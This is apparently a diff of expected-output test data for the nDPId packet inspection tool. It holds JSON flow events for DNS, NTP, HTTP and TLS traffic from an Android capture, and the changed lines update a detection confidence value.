-00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 
+00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454867284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1582454867284,"pkt":"TGr2n\/YnxiwDYGpkCABFAAB+z3oAAEARJZPAqAIBwKgCEAA1i\/EAapnsoPSBgAABAAQAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAcAMAAEAAQAAARgABNjvIwjADAABAAEAAAEYAATY7yMAwAwAAQABAAABGAAE2O8jBMAMAAEAAQAAARgABNjvIww="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}} +00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454867323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454867323,"pkt":"xiwDYGpkTGr2n\/YnCABFAABMoTdAAEAR2rnAqAIQ2O8jCLMnAHsAOGfAGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOH81o7jEm7M"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454867358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454867358,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMa8oAAGcRKSfY7yMIwKgCEAB7sycAOKcPHAEA7AAAAAAAAAAMR09PR+H81tNW8KhI4fzWjuMSbszh\/NbTVvCoSeH81tNW8KhL"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454867637,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867637,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqXVAAEARC9XAqAIQwKgCAYbsADUALQrUr3oBAAABAAAAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
